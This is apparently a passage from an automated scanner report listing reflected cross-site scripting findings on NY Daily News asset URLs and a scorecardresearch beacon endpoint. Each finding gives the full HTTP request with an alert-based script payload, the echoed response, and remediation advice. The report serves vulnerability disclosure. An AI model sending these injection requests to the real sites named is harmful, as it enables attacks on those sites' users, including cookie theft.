Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:54 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
okie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001/nydn_section.css50562';alert(1)//8959375d35d';
}


   //-->
...[SNIP]...

4.169. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_wrapper.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1212'%3balert(1)//7d7f91a6743 was submitted in the REST URL parameter 1. This input was echoed as e1212';alert(1)//7d7f91a6743 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /csse1212'%3balert(1)//7d7f91a6743/20101001/nydn_wrapper.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:50 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/csse1212';alert(1)//7d7f91a6743/20101001/nydn_wrapper.css';
}


   //-->
...[SNIP]...

4.170. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_wrapper.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 451b8'%3balert(1)//09a243ac9e4 was submitted in the REST URL parameter 2. This input was echoed as 451b8';alert(1)//09a243ac9e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20101001451b8'%3balert(1)//09a243ac9e4/nydn_wrapper.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:34 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001451b8';alert(1)//09a243ac9e4/nydn_wrapper.css';
}


   //-->
...[SNIP]...

4.171. http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/20101001/nydn_wrapper.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74472'%3balert(1)//c53a03f00f was submitted in the REST URL parameter 3. This input was echoed as 74472';alert(1)//c53a03f00f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/20101001/nydn_wrapper.css74472'%3balert(1)//c53a03f00f HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:49 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
okie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/20101001/nydn_wrapper.css74472';alert(1)//c53a03f00f';
}


   //-->
...[SNIP]...

4.172. http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/thickbox.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45467'%3balert(1)//93ee1c912e9 was submitted in the REST URL parameter 1. This input was echoed as 45467';alert(1)//93ee1c912e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css45467'%3balert(1)//93ee1c912e9/thickbox.css HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:07 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css45467';alert(1)//93ee1c912e9/thickbox.css';
}


   //-->
...[SNIP]...

4.173. http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /css/thickbox.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84c91'%3balert(1)//d25f0f01566 was submitted in the REST URL parameter 2. This input was echoed as 84c91';alert(1)//d25f0f01566 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/thickbox.css84c91'%3balert(1)//d25f0f01566 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:21 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/css/thickbox.css84c91';alert(1)//d25f0f01566';
}


   //-->
...[SNIP]...

4.174. http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/nydn-pack-20101001.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 685e9'%3balert(1)//22666baf37e was submitted in the REST URL parameter 1. This input was echoed as 685e9';alert(1)//22666baf37e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js685e9'%3balert(1)//22666baf37e/nydn-pack-20101001.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:45 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js685e9';alert(1)//22666baf37e/nydn-pack-20101001.js';
}


   //-->
...[SNIP]...

4.175. http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/nydn-pack-20101001.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9c8c'%3balert(1)//d85129c0960 was submitted in the REST URL parameter 2. This input was echoed as b9c8c';alert(1)//d85129c0960 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/nydn-pack-20101001.jsb9c8c'%3balert(1)//d85129c0960 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:38:36 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
ry.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js/nydn-pack-20101001.jsb9c8c';alert(1)//d85129c0960';
}


   //-->
...[SNIP]...

4.176. http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/thickbox.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d74d'%3balert(1)//f26d587210b was submitted in the REST URL parameter 1. This input was echoed as 8d74d';alert(1)//f26d587210b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js8d74d'%3balert(1)//f26d587210b/thickbox.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:48 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js8d74d';alert(1)//f26d587210b/thickbox.js';
}


   //-->
...[SNIP]...

4.177. http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/thickbox.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2772'%3balert(1)//244e853bb28 was submitted in the REST URL parameter 2. This input was echoed as d2772';alert(1)//244e853bb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/thickbox.jsd2772'%3balert(1)//244e853bb28 HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:22 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js/thickbox.jsd2772';alert(1)//244e853bb28';
}


   //-->
...[SNIP]...

4.178. http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/webtrends.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c68c0'%3balert(1)//d1c46ff0b51 was submitted in the REST URL parameter 1. This input was echoed as c68c0';alert(1)//d1c46ff0b51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc68c0'%3balert(1)//d1c46ff0b51/webtrends.js HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:37:48 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Cache-Control: private
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/jsc68c0';alert(1)//d1c46ff0b51/webtrends.js';
}


   //-->
...[SNIP]...

4.179. http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://assets.nydailynews.com
Path:   /js/webtrends.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df507'%3balert(1)//1ee8507ef3e was submitted in the REST URL parameter 2. This input was echoed as df507';alert(1)//1ee8507ef3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/webtrends.jsdf507'%3balert(1)//1ee8507ef3e HTTP/1.1
Host: assets.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 16:39:22 GMT
Server: Apache
Content-Type: text/html
Content-Language: en
Connection: close

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://origin.nydailynews.com/js/webtrends.jsdf507';alert(1)//1ee8507ef3e';
}


   //-->
...[SNIP]...

4.180. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 3db19<script>alert(1)</script>af553f35587 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=83db19<script>alert(1)</script>af553f35587&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:28 GMT
Date: Fri, 28 Jan 2011 16:37:28 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"83db19<script>alert(1)</script>af553f35587", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.181. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 6af11<script>alert(1)</script>c9e14de8521 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=31822366af11<script>alert(1)</script>c9e14de8521&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:29 GMT
Date: Fri, 28 Jan 2011 16:37:29 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"", c10:"31822366af11<script>alert(1)</script>c9e14de8521", c15:"", c16:"", r:""});

4.182. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6f583<script>alert(1)</script>358848f85ca was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6135404&c3=15&c4=7477&c5=&c6=&c10=3182236&c15=6f583<script>alert(1)</script>358848f85ca HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:30 GMT
Date: Fri, 28 Jan 2011 16:37:30 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6135404", c3:"15", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"6f583<script>alert(1)</script>358848f85ca", c16:"", r:""});

4.183. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8fbbd<script>alert(1)</script>a4264343a60 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=61354048fbbd<script>alert(1)</script>a4264343a60&c3=15&c4=7477&c5=&c6=&c10=3182236&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Fri, 04 Feb 2011 16:37:28 GMT
Date: Fri, 28 Jan 2011 16:37:28 GMT
Connection: close
Content-Length: 3593

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"61354048fbbd<script>alert(1)</script>a4264343a60", c3:"15", c4:"7477", c5:"", c6:"", c10:"3182236", c15:"", c16:"", r:""});

4.184. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
